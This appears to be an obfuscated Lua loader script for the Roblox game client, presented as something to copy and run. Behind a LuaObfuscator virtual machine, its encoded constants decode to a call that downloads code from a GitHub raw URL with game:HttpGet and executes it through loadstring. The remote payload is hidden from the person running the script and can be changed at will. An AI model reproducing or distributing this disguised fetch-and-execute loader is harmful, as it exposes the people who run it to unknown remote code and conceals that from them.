






-- COPY BELOW AND RUN IF BREAKS IDK


--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v31)if (v1(v31,2)==79) then v20=v0(v3(v31,1,1));return "";else local v75=v2(v0(v31,16));if v20 then local v79=v5(v75,v20);v20=nil;return v79;else return v75;end end end);v18=1;end if (v18==3) then v24=nil;v24=function()local v39,v40,v41,v42=v1(v16,v19,v19 + (872 -(44 + 178 + (2792 -2145))) );v19=v19 + (767 -(508 + 255)) ;return (v42 * (49632741 -32855525)) + (v41 * (21433 + 44103)) + (v40 * (743 -487)) + v39 ;end;v25=nil;v18=4;end if (v18==6) then v29=nil;v29=function()local v43=0;local v44;local v45;local v46;local v47;local v48;local v49;local v50;local v51;while true do if (v43~=3) then else v50=nil;v51=nil;v43=7 -3 ;end if (v43~=4) then else while true do if (v44==(1660 -(432 + 1228))) then local v90=0 -0 ;while true do if (v90~=1) then else v44=1;break;end if (0==v90) then v45=0 -0 ;v46=nil;v90=1;end end end if (v44~=(2 + 1)) then else v51=nil;while true do local v95=0;local v96;while true do if (v95==(0 + 0)) then v96=734 -(411 + 323) ;while true do if (v96==(168 -(139 + 29))) then if (1~=v45) then else local v107=0;while true do if (v107==(0 -0)) then local v127=0;while true do if (v127==(0 + 0)) then v50=v24();v51={};v127=1;end if (v127==1) then v107=4 -3 ;break;end end end if (v107==2) then v45=1540 -(299 + 1239) ;break;end if (v107~=(1236 -(1125 + 110))) then else for v129=1017 -(805 + 211) ,v50 do local v130=921 -(158 + 763) ;local v131;local v132;local v133;local v134;while true do if (v130~=(3 -2)) then else v133=nil;v134=nil;v130=3 -1 ;end if ((5 -3)~=v130) then else while true do if (v131==(0 -0)) then local v150=0 -0 ;while true do if (1==v150) then v131=1 -0 ;break;end if (v150==(1021 -(606 + 415))) then v132=0;v133=nil;v150=1;end end end if (v131==(1 -0)) then v134=nil;while true do if (v132==(1 + 0)) then if (v133==(1 + 0)) then v134=v22()~=0 ;elseif (v133==(4 -2)) then v134=v25();elseif (v133==(10 -7)) then v134=v26();end v51[v129]=v134;break;end if (v132==0) then local v156=0;while true do if (v156==(0 -0)) then local v163=0;while true do if (v163~=0) then else v133=v22();v134=nil;v163=2 -1 ;end if (v163==(1 -0)) then v156=1;break;end end end if (1~=v156) then else v132=1;break;end end end end break;end end break;end if (v130==0) then v131=0;v132=nil;v130=1 -0 ;end end end v49[3 + 0 ]=v22();v107=2;end end end if (v45~=2) then else local v108=0;local v109;while true do if (v108==0) then v109=0;while true do local v135=811 -(301 + 510) ;while true do if (v135==0) then if (v109==1) then for v151=1,v24() do v48[v151]=v24();end return v49;end if ((0 + 0)~=v109) then else local v145=0;while true do if (v145~=(696 -(373 + 322))) then else v109=1;break;end if (v145~=0) then else for v157=1 + 0 ,v24() do local v158=0 -0 ;local v159;local v160;while true do if (v158~=(0 + 0)) then else v159=0;v160=nil;v158=1;end if (v158~=1) then else while true do if (v159==(0 -0)) then v160=v22();if (v21(v160,1 + 0 ,1 -0 )==(0 + 0)) then local v164=811 -(241 + 570) ;local v165;local v166;local v167;local v168;local v169;local v170;while true do if (v164==3) then while true do if (v165~=0) then else v166=0;v167=nil;v165=1;end if (v165~=2) then else v170=nil;while true do if (v166~=(1 -0)) then else v169=nil;v170=nil;v166=3 -1 ;end if ((0 + 0)~=v166) then else v167=0 + 0 ;v168=nil;v166=1 + 0 ;end if (2==v166) then while true do if (v167==(461 -(89 + 370))) then local v172=0;local v173;while true do if (v172~=0) then else v173=0;while true do if (v173~=1) then else v167=3;break;end if (0==v173) then local v182=0 -0 ;while true do if (v182==(1555 -(1389 + 166))) then if (v21(v169,1,3 -2 )~=1) then else v170[8 -6 ]=v51[v170[438 -(401 + 35) ]];end if (v21(v169,1797 -(153 + 1642) ,3 -1 )==(2 -1)) then v170[3]=v51[v170[13 -10 ]];end v182=1;end if (v182~=(1966 -(1474 + 491))) then else v173=1 + 0 ;break;end end end end break;end end end if (v167~=3) then else if (v21(v169,1 + 2 ,5 -2 )==(1384 -(1065 + 318))) then v170[4 + 0 ]=v51[v170[10 -6 ]];end v46[v157]=v170;break;end if (0~=v167) then else local v175=0;local v176;local v177;while true do if (v175==1) then while true do if (v176==0) then v177=1323 -(972 + 351) ;while true do if (v177~=1) then else v167=1;break;end if (v177==0) then local v184=288 -(34 + 254) ;local v185;while true do if (v184~=0) then else v185=0 + 0 ;while true do if (v185~=(1 + 0)) then else v177=258 -(251 + 6) ;break;end if (v185==(0 -0)) then local v193=0;while true do if (v193~=(0 -0)) then else v168=v21(v160,2,3 + 0 );v169=v21(v160,2 + 2 ,17 -11 );v193=1;end if (v193==(1602 -(744 + 857))) then v185=1;break;end end end end break;end end end end break;end end break;end if (v175~=0) then else v176=0 + 0 ;v177=nil;v175=1;end end end if (v167~=1) then else local v178=0;while true do if ((1 + 0)~=v178) then else v167=2;break;end if ((0 -0)~=v178) then else local v181=0 -0 ;while true do if ((2 -1)~=v181) then else v178=1;break;end if (v181~=(0 + 0)) then else local v183=0;while true do if (v183==(0 + 0)) then v170={v23(),v23(),nil,nil};if (v168==(1900 -(760 + 1140))) then local v190=0 + 0 ;local v191;while true do if (v190~=(0 + 0)) then else v191=0 + 0 ;while true do if (v191==(0 + 0)) then v170[3 + 0 ]=v23();v170[1962 -(1774 + 184) ]=v23();break;end end break;end end elseif (v168==(1 + 0)) then v170[3]=v24();elseif (v168==2) then v170[3 + 0 ]=v24() -(2^16) ;elseif (v168~=3) then else local v197=0 + 0 ;local v198;local v199;while true do if (v197==(0 + 0)) then v198=0 -0 ;v199=nil;v197=1;end if (v197~=(1 + 0)) then else while true do if (v198==(0 + 0)) then v199=0 -0 ;while true do if (v199==(0 + 0)) then v170[1267 -(170 + 1094) ]=v24() -((5 -3)^(8 + 8)) ;v170[8 -4 ]=v23();break;end end break;end end break;end end end v183=1;end if (v183~=1) then else v181=1;break;end end end end end end end end break;end end break;end if (v165~=1) then else local v171=1875 -(494 + 1381) ;while true do if (v171~=(0 -0)) then else v168=nil;v169=nil;v171=1;end if (v171==(2 -1)) then v165=2;break;end end end end break;end if ((0 + 0)==v164) then v165=0;v166=nil;v164=4 -3 ;end if (v164==2) then v169=nil;v170=nil;v164=3;end if (v164==1) then v167=nil;v168=nil;v164=2;end end end break;end end break;end end end for v161=1,v24() do v47[v161-(1 -0) ]=v29();end v145=1;end end end break;end end end break;end end end v96=1;end if ((2 -1)~=v96) then else if (v45==(0 -0)) then local v110=0 -0 ;local v111;local v112;while true do if (v110==(0 + 0)) then v111=0;v112=nil;v110=1 + 0 ;end if (v110~=1) then else while true do if (v111==0) then v112=0;while true do if (v112~=(2 + 0)) then else v45=1;break;end if (v112==0) then local v146=0;while true do if ((1 -0)==v146) then v112=178 -(39 + 138) ;break;end if (v146==0) then v46={};v47={};v146=2 -1 ;end end end if (v112~=1) then else local v147=0 + 0 ;while true do if (1==v147) then v112=928 -(712 + 214) ;break;end if (v147==(689 -(346 + 343))) then v48={};v49={v46,v47,nil,v48};v147=1;end end end end break;end end break;end end end break;end end break;end end end break;end if (v44~=2) then else local v91=0 + 0 ;while true do if (v91==(0 + 0)) then v49=nil;v50=nil;v91=1 + 0 ;end if (v91==1) then v44=3;break;end end end if (v44==(1 -0)) then v47=nil;v48=nil;v44=4 -2 ;end end break;end if (v43==0) then v44=0;v45=nil;v43=374 -(139 + 234) ;end if (v43==1) then v46=nil;v47=nil;v43=2;end if (v43==(2 -0)) then v48=nil;v49=nil;v43=5 -2 ;end end end;v30=nil;v18=7;end if (v18==1) then v21=nil;v21=function(v32,v33,v34)if v34 then local v76=0 -0 ;local v77;while true do if (v76==(0 -0)) then v77=(v32/((5 -3)^(v33-(1 + 0))))%((1 + 1 + 0)^(((v34-(1 + 0)) -(v33-(1 + 0))) + 1 + 0)) ;return v77-(v77%1) ;end end else local v78=(1 + 1)^(v33-1) ;return (((v32%(v78 + v78))>=v78) and (408 -(141 + 266))) or ((981 -(240 + 546)) -(180 + 15)) ;end end;v22=nil;v18=2;end if (4==v18) then v25=function()local v52=1676 -(1184 + (1805 -(825 + 488))) ;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v52==(0 + 0 + 0)) then v53=v24();v54=v24();v52=1 + 0 + 0 ;end if (((3 -2) + 0)==v52) then v55=1 + 0 ;v56=(v21(v54,110 -(34 + 75) ,4 + 16 ) * ((4 -2)^(92 -60))) + v53 ;v52=1720 -(368 + 1350) ;end if (v52==((12 + 66) -(26 + 49))) then if (v57==(1185 -(39 + 1146))) then if (v56==(0 + 0)) then return v58 * ((328 -(285 + 43)) + 0) ;else v57=1 + 0 + 0 ;v55=0 -0 ;end elseif (v57==(803 + 1244)) then return ((v56==(1274 -(796 + (1408 -(539 + 391))))) and (v58 * (1/(0 + 0)))) or (v58 * NaN) ;end return v8(v58,v57-(3402 -2379) ) * (v55 + (v56/((1 + 1)^(247 -195)))) ;end if (v52==((1027 -(50 + 1)) -(659 + 315))) then v57=v21(v54,(61 + 18) -(43 + 15) ,25 + 6 );v58=((v21(v54,32)==(3 -2)) and  -(954 -(556 + 15 + 382))) or ((432 -(130 + 196)) -(74 + 31)) ;v52=4 -1 ;end end end;v26=nil;v26=function(v35)local v59;if  not v35 then v35=v24();if (v35==(0 -0)) then return "";end end v59=v3(v16,v19,(v19 + v35) -(282 -(17 + 264)) );v19=v19 + v35 ;local v60={};for v67=1 + 0 , #v59 do v60[v67]=v2(v1(v3(v59,v67,v67)));end return v6(v60);end;v18=5;end if (7==v18) then v30=function(v36,v37,v38)local v61=v36[1];local v62=v36[2];local v63=v36[3];return function(...)local v69=0;local v70;local v71;local v72;local v73;local v74;while true do if (v69==0) then v70=1;v71= -1;v69=1;end if (3==v69) then A,B=v28(v11(v74));if  not A[1] then local v92=v36[4][v70] or "?" ;error("Script error at ["   .. v92   .. "]:"   .. A[2] );else return v13(A,2,B);end break;end if (v69==1) then v72={...};v73=v12("#",...) -1 ;v69=2;end if (v69==2) then v74=nil;v74=function()local v80=v61;local v81=v62;local v82=v63;local v83=v28;local v84={};local v85={};local v86={};for v93=0 -0 ,v73 do if ((v93>=v82) or (((6359 -(1648 + 50)) -(712 + 1031))<(2820 -(18 + 180)))) then v84[v93-v82 ]=v72[v93 + 1 + 0 ];else v86[v93]=v72[v93 + (1 -0) + 0 ];end end local v87=(v73-v82) + 1 + 0 ;local v88;local v89;while true do local v94=0 + 0 ;while true do if ((75==(19 + 56)) and (v94==(85 -(67 + 18)))) then v88=v80[v70];v89=v88[1 + 0 ];v94=1 -(0 -0) ;end if ((v94==(374 -(220 + 153))) or ((9537 -5439)<=(53 + 3798))) then if ((v89<=(3 -1)) or ((1750 + 2374)==3935)) then if ((v89<=(0 + 0)) or ((1680 -(66 + 153))<=(2227 -1507))) then local v103=1611 -(1609 + 2) ;local v104;local v105;local v106;while true do if ((v103==(0 -0)) or ((16128 -11225)<(5168 -3073))) then v104=1637 -(56 + 58 + 1523) ;v105=nil;v103=3 -2 ;end if (((3348 -(52 + 18))>(3447 -(748 + 154 + 57))) and (v103==(1 + 0))) then v106=nil;while true do if (((933 -(84 + 848))==v104) or ((414 -(253 + 153))>=(3972 -(382 + 73)))) then v86[v105 + 1 ]=v106;v86[v105]=v106[v88[4]];break;end if ((v104==(0 -0)) or (3420<=(2142 -(1183 + 53)))) then v105=v88[(1342 -(336 + 1005)) + (100 -(59 + 40)) ];v106=v86[v88[9 -6 ]];v104=117 -(50 + (145 -(8 + 71))) ;end end break;end end elseif (((186 + 578)<((5852 -3246) -(982 + 832))) and (v89==(2 -1))) then local v113=0 -0 ;local v114;local v115;local v116;local v117;local v118;while true do if ((v113==(359 -(14 + 345))) or ((3734 + 1259)==(3353 -(37 + 143)))) then v114=0 -0 ;v115=nil;v113=3 -2 ;end if ((v113==(3 -(1 + 0))) or (2089>=4232)) then v118=nil;while true do if ((v114==(3 -1)) or (((698 -(45 + 355)) + 2095)>3022)) then for v143=v115,v71 do local v144=0 -0 ;while true do if ((v144==(731 -(204 + 527))) or ((3918 -(108 + 51))==3209)) then v118=v118 + (4 -3) + 0 ;v86[v143]=v116[v118];break;end end end break;end if ((((116 + 84) -(47 + 152))==v114) or (3585<=(1628 -649))) then local v141=0 -0 ;while true do if ((v141==((2474 -(785 + 939)) -(246 + 503))) or ((4357 -(233 + 1455))<2264)) then v114=2;break;end if ((((1894 -(1294 + 373)) + 23)<(8310 -4247)) and (v141==(0 + 0))) then v71=(v117 + v115) -(1 -0) ;v118=0 -0 ;v141=1 + 0 ;end end end if (((2830 -(10 + (1250 -(213 + 899))))>=((1080 + 304) -(1663 -1087))) and (v114==0)) then v115=v88[51 -(26 + 23) ];v116,v117=v83(v86[v115](v13(v86,v115 + 1 ,v88[1 + 2 ])));v114=1036 -(184 + 851) ;end end break;end if (((84 + 162)<(3762 + 647)) and (v113==(1 + 0))) then v116=nil;v117=nil;v113=3 -(1 -0) ;end end else v86[v88[(3 -2) + 1 ]]=v38[v88[3 + 0 ]];end elseif ((v89<=(15 -11)) or ((1172 + 448)>=(2880 -(17 + 919)))) then if ((v89==(1 + 2)) or ((937 + 1457)>=(3005 -((278 -173) + 320)))) then local v121=0 -0 ;local v122;local v123;local v124;while true do if (((1 + 0)==v121) or (4036==(2445 -(404 + 921)))) then v124=nil;while true do if ((v122==(1372 -(468 + 904))) or (((353 -153) -(4 + 98))>750)) then v123=0;v124=nil;v122=3 -2 ;end if (((764 -(2110 -(818 + 731)))<(7591 -3734)) and (v122==(1901 -(538 + 1216 + 146)))) then while true do if (((1903 -(1505 + 164))<=(2928 -1106)) and (v123==0)) then v124=v88[5 -(1981 -(1543 + 435)) ];v86[v124]=v86[v124](v13(v86,v124 + (1804 -(498 + 1305)) ,v71));break;end end break;end end break;end if ((1504<=(10987 -7442)) and (0==v121)) then v122=0;v123=nil;v121=827 -((2412 -(1095 + 586)) + 95) ;end end else v86[v88[7 -5 ]]=v88[367 -(7 + 357) ];end elseif ((v89>5) or ((1204 -(239 + 582))>(9512 -6243))) then do return;end else v86[v88[1 + 1 ]]();end v70=v70 + (1 -0) ;break;end end end end;v69=3;end end end;end;return v30(v29(),{},v17)(...);end if (2==v18) then v22=function()local v64=v1(v16,v19,v19);v19=v19 + 1 ;return v64;end;v23=nil;v23=function()local v65,v66=v1(v16,v19,v19 + 1 + 1 );v19=v19 + (5 -3) ;return (v66 * (1733 -(974 + 503))) + v65 ;end;v18=3;end if (v18==5) then v27=v24;v28=nil;v28=function(...)return {...},v12("#",...);end;v18=6;end end end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403453O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F7465736B696E6739352F7A2D6B7A6E6F73612F6D61696E2F6B7A6E6F74732O656C6F6C00083O0012023O00013O001202000100023O00202O000100010003001204000300044O0001000100034O00035O00022O00053O000100012O00063O00017O00083O00023O00023O00023O00023O00023O00023O00023O00033O00",v9(),...);end
